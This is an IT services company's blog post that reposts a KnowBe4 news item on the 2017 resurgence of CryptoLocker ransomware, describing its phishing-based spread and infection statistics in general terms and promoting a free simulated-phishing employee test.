New Massive Wave of CryptoLocker Ransomware Infections

CryptoLocker Is Back!

One of the most dangerous online attacks that we regularly see at On Site Services had gone on a short hiatus but has now come back with a vengeance and thus you need to be extra vigilante with your online security. Below is a portion of a recent article taken from Cyber Heist News by KnowBE4, a trusted online security monitoring source.
We all thought that evil genius Evgeniy Bogachev had retired at the Black Sea with his tens of millions of ill-gotten gains after he became the FBI's #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.

CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.

For people new to the ransomware racket, Russian cybercrime gangs tend to test and debug their campaigns in Europe, and then attack America in full force. CryptoLocker is ransomware's still very potent granddaddy, and pioneered this highly successful criminal business model in September 2013, hundreds of copycats followed.

In a blog post our friend Larry Abrams from BleepingComputer wrote that the strain -- also known as Torrentlocker and Teerac -- started its comeback toward the end of January 2017, after being quiet the second half of 2016.

Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumped from a just handful to nearly 100 per day to more than 400 per day by February.

He also confirmed CryptoLocker's recent tsunami with Microsoft's Malware Protection Center, whose telemetry picked up on increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but it is all just social engineering to trick the recipient and get them to open attached .JS files that download and install CryptoLocker.

Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. "The HTML contains a JS file, which pulls a second JS file from an Amazon server, which executes the first one in memory," said Lotem Finklesteen, threat intelligence researcher at Check Point.

"Then, after pulling two more JS files, CryptoLocker is served to the victim machine and being executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany," said Finklesteen.

Ransomware as a global threat

Microsoft's Malware Protection Center blog stated: "Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters.

Geographic distribution data at the KnowBe4 Blog, with links and charts:

Preventing Ransomware Infections

Which user will infect your network with ransomware? We've got something really cool for you: the new Phishing Security Test v2.0! It has several great new features, and sending simulated phishing emails to train your employees is a fun and an effective best practice to patch your last line of defense... your users. The Phish-prone percentage is usually higher than you expect and is great ammo to get budget. You can now find out the current Phish-prone percentage of your organization and who might infect your network with ransomware.
With Our Brand-New Phishing Test:
• You can customize the phishing test based on your environment
• Choose the landing page your users see after they click
• Show users which red flags they missed, or a 404 page
• Get a PDF emailed to you in 24 hours with your Phish-prone % and charts to share with management
• Already did a phishing test in the past? For a limited time you can reset it yourself and do a new one. Start phishing your users now. Fill out the form, and get started immediately. There is no cost.
Go Phishing Now!

Let's stay safe out there.

Tagged with: , ,